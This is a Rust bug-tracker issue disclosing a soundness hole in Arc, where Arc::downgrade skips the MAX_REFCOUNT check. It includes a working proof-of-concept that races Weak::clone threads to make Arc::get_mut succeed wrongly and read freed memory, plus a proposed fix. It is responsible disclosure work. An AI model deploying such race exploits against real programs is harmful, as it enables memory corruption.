Skip to content

Overflow in Arc #108706

Closed
Closed
@noamtashma

Description

@noamtashma

I discovered a memory safety vulnerability in the standard library's Arc.

Before the rest of the issue, I just want to say thanks in advance to everyone involved for helping to keep rust safe 🦀 :)

Description of the vulnerability:

In Weak::clone, the weak count is incremented using fetch_add, and then it's checked whether the result passed MAX_REFCOUNT. As is documented in Arc::clone's code, this is because if the counter gets too close to overflowing, the overflow might happen before the call to abort completes, breaking Arc's invariants and probably causing UB. Checking if the counter passed MAX_REFCOUNT means that at least 2^15 (in 16-bit platforms) increments to the counter before abort completes are needed for an overflow.

However, in Arc::downgrade, the code increments the weak count, without checking that the counter doesn't pass MAX_REFCOUNT . This allows the counter to get all the way up to usize::MAX - 1. Then, using Weak::clone, we can get a much more favorable race than intended.

Therefore, the attack is as follows:

We use Arc::downgrade to increment the weak count all the way to usize::MAX - 1, then run Weak::clone three times in parallel.
The first two will call abort, but the third will result in a weak count of 1, indicating that there are no remaining Weaks (while there actually are).
Then we can abuse this broken invariant to cause UB, for example through Arc::get_mut, as long as we manage to do so before either of the two abort calls complete.

Demonstration of the vulnerability:

Note than to run this exploit yourself, if you're running a 64-bit architecture, the exploit won't run in a reasonable length of time. So Arc has to be modified to lower the counter to 32-bits, to demonstrate the vulnerability.

The exploit in code

type Counter = usize;

fn exploit() {
    println!("Started!");
    use std::boxed::Box;
    use std::sync::*;
    // use crate::sync::atomic::{AtomicBool, Ordering};

    let arc = Arc::new(Box::new(7));

    // Keep one of the weaks alive
    let weak = Arc::downgrade(&arc);

    // The weak count starts at `1`.
    // Increase to `Counter::MAX - 1`.
    for i in 0..Counter::MAX - 3 {
        std::mem::forget(Arc::downgrade(&arc));
        if i % 100000000 == 0 {
            println!("{i} out of {}", Counter::MAX);
        }
    }

    let mutex_arc = std::sync::Mutex::new(Some(arc));

    println!("Finished incrementing");

    // let start = AtomicBool::new(false);

    // We run this function three times in parallel, to trigger our vulnerability.
    let evil = || {
        let id = std::thread::current().id();

        // You can try this if some extra syncronization is wanted, to make all three threads
        // start at the approximately same time. I didn't end up needing it, so I don't know if it even helps.
        // loop {
        //     if start.load(Ordering::Relaxed) {
        //         break;
        //     }
        // }
        let weak2 = weak.clone();
        println!("{id:?}: Managed to clone!");
        // Take the `Arc`
        let arc = mutex_arc.lock().unwrap().take();
        let Some(mut arc) = arc else {
            println!("{id:?}: Error: Arc already taken!");
            return;
        };
        println!("{id:?}: Arc taken!");
        // This will succeed even though we still have a `Weak`
        let Some(val) = Arc::get_mut(&mut arc) else {
            println!("{id:?}: Error: Failed to get unique access :(");
            return; // Didn't manage to exploit :(
        };
        println!("{id:?}: Succeeded!");

        let arc2 = weak2.upgrade().unwrap();
        let also_val = &**arc2;
        // `val` and `also_val` point to the same value.
        println!("{id:?}: also_val: {also_val}");
        **val = 9;
        println!("{id:?}: also_val: {also_val}");
        *val = Box::new(5);
        // Now `also_val` points to freed memory
        println!("{id:?}: also_val: {also_val}");
    };

    std::thread::scope(|s| {
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        // let _ = s.spawn(|| {
        //     start.store(true, Ordering::Relaxed);
        // });
    });

    println!("Done.\n\n\n");
}

Running on 64-bit architectures

This is how I tested the exploit myself. I modified the `std` so that the counter would only be a `u32`, and ran the exploit as a "test", with this command:

> ./x.py --stage 0 test library/alloc --test-args "exploit --nocapture"

This is also present here.

Fixing:

The fix is very simple. In the Arc::downgrade compare-exchange loop, add a check that if cur > MAX_REFCOUNT, and it's not usize::MAX, panic.
Add a comment explaining that not straying too much above MAX_REFCOUNT is a global invariant, and must be enforced in all increment operations.

Severity:

I'm not sure how severe it is, since it depends on a race with abort, and I don't know how to assess winning this race in real code on different platforms.

It should also be noted that in order for this to be exploited, a large amount of Weaks need to be leaked (depending on usize size), without also leaking heap memory (otherwise the program would run out of memory first).

Metadata

Metadata

Assignees

Labels

A-atomicArea: Atomics, barriers, and sync primitivesC-bugCategory: This is a bug.I-unsoundIssue: A soundness hole (worst kind of bug), see: https://en.wikipedia.org/wiki/SoundnessP-lowLow priorityT-libsRelevant to the library team, which will review and decide on the PR/issue.

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions